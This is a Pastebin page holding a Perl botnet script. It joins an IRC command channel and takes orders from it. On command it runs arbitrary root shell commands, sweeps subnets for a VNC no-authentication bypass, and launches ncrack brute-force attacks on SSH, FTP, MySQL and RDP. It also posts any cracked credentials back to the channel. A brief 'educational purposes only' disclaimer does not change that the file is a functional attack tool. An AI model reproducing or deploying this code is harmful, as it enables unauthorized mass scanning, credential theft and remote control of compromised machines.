Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # Use at your own risk!
- #For it to crack you need to install ncrack or be using a l337 OS like KaliLinux v2
- #Also you will need to create /user and /pass file (the tested credentials on target)
- #The code is still buggy. Sorry but I'm still noob at perl >_>
- #invoke the script like this: sudo perl scan.pl (or as root) perl scan.pl
- #This script was made for eduactional purposes only, please don't attack millitary nor government.
- #when you think you gotpasswords in your list type to the bot or channel !list will say it found credentials
- use IO::Socket;
- use IO::Socket::INET;
- use threads;
- use threads::shared;
- use Errno qw(EAGAIN);
- use strict;
- use warnings;
- my $line;
- our @results : shared;
- our $todo = 0;
- our $contatore = 0;
- my $orig_thread = "yes";
- my $start;
- my $end;
- my $out_file;
- my $range = 99999;
- my $random_number = int(rand($range));
- my @VNC_PORTS = qw/5900 5901/;
- my @ncrack_PORTS = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
- my $splits = 8; # Creates 2^N processes.
- our $subnet;
- my $server="irc.crimeircd.net"; # irc server
- my $porta="6667"; # port
- my $nick="Guest$random_number";# nick
- my $canale="#RDP"; # canale
- my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
- $sk->autoflush(1);
- print $sk "NICK $nick\r\n";
- print $sk "USER Guest$random_number 8 * :Perl bot by independent\r\n";
- while ($line = <$sk>) {
- $line =~ s/\r\n$//;
- warn "$line";
- if ($line=~ /PING/) {
- print $sk "PONG :$server\r\n";
- print $sk "JOIN $canale \r\n";
- printa("?Ping Pong!, pastebin.com/raw/cp5BZnv4");
- }
- if ($line=~ /nospoof/) {
- print $sk "NOTICE IRC :mIRC v7.45\r\n";
- print $sk "CAP LS\r\n";
- print $sk "CAP END\r\n";
- }
- if ($line=~ /!help/) {
- printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
- }
- if ($line=~ /!list/)
- {
- my $file = 'xploits.log';
- open my $fh, '<', $file or warn "Could not open '$file' $!\n";
- while (my $lines = <$fh>) {
- chomp $lines;
- if ($lines=~ /'/) {
- printa("$lines");
- }
- }
- }
- if ($line=~ /!reload/)
- {
- printa("Reloading...");
- my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill ncrack");
- system(@cmd);
- }
- if ($line=~ /!die/)
- {
- printa("Dying...");
- my @cmd = ("sudo pkill perl && sudo pkill ncrack");
- system(@cmd);
- }
- if ($line=~ /!sudo\s+(.*)/)
- {
- my $command = $1;
- printa("Done: $command ");
- my $cmd = "sudo $command";
- my @output = `$cmd 2>&1 3>&1`;
- foreach(@output) {
- printa("$_\r\n");
- }
- }
- if ($line=~ /!scan (.+)/)
- {
- $todo = 0;
- $subnet = $1;
- if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
- # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
- $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
- $subnet .= ".";
- printa("Scanning subnet ${subnet}x\n");
- CHECK: {
- unless ($splits >= 0 && $splits <= 8) {
- die "ERROR: Do not split $splits times--that makes no sense.\n";
- }
- }
- # Ugly, but this works.
- DivideWork() if $splits >= 1;
- DivideWork() if $splits >= 2;
- DivideWork() if $splits >= 3;
- DivideWork() if $splits >= 4;
- DivideWork() if $splits >= 5;
- DivideWork() if $splits >= 6;
- DivideWork() if $splits >= 7;
- DivideWork() if $splits >= 8;
- $start = $todo << (8 - $splits);
- $end = $start + (256 / (2**$splits)) - 1;
- foreach ($start .. $end) {
- Scan_ALL($_);
- }
- }
- else {
- printa("Are you brain-dead? Use a correct IP format. ");
- }
- }
- }
- ####################################
- sub DivideWork {
- my $pid;
- FORK: {
- $todo *= 2;
- if ($pid = fork) {
- # Parent
- ++$todo;
- } elsif (defined $pid) {
- # Child
- $orig_thread = "no";
- } elsif ($! == EAGAIN) {
- # Recoverable forking error.
- sleep 7;
- redo FORK;
- } else {
- # Unable to fork.
- printa("Unable to fork: $!\n");
- }
- }
- }
- sub Scan_ALL {
- # Scan for OpenVNC 4.11 authentication bypass.
- my $hostnum = shift;
- my $host = $subnet . $hostnum;
- my $sock;
- my $proto_ver;
- my $ignored;
- my $auth_type;
- my $sec_types;
- my $vnc_data;
- $host or printa("ERROR: missing Host IP address Scan_ALL.");
- # The host numbers .0 and .255 are reserved; ignore them.
- if ($hostnum <= 0 or $hostnum >= 255) { return; }
- # Format things nicely--that crazy formula just adds spaces.
- $results[$hostnum] = "$host";
- $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
- foreach my $port (@VNC_PORTS)
- {
- if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')) {
- $sock->read($proto_ver, 12);
- print $sock $proto_ver;
- # Get supported security types and ignore them.
- $sock->read($sec_types, 1);
- $sock->read($ignored, unpack('C', $sec_types));
- # Claim that we only support no authentication.
- print $sock "\x01";
- # We should get "0000" back, indicating that they won't fall back to no authentication.
- $sock->read($auth_type, 4);
- if (unpack('I', $auth_type)) {
- close($sock);
- return;
- }
- # Client initialize.
- print $sock "\x01";
- # If the server starts sending data, we're in.
- $sock->read($vnc_data, 4);
- printa("[Xploiting VNC] $host");
- if (unpack('I', $vnc_data)) {
- $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
- printa("9,3 [ $port ] $results[$hostnum] $port ");
- }
- }
- }
- foreach my $port (@ncrack_PORTS)
- {
- if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port->[0], Proto => 'tcp')) {
- close($sock);
- printa("[Cracking " . $port->[1] . "] $host");
- my @cmdncrack = ("ncrack -U /user -P /pass " . lc($port->[1]) . "://" . $host . ",at=5,cl=1,CL=3,cd=5s,cr=0,to=2h --connection-limit 64 -v -f >>xploits.log");
- system(@cmdncrack);
- return;
- }
- }
- close($sock);
- return;
- }
- sub printa {
- print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement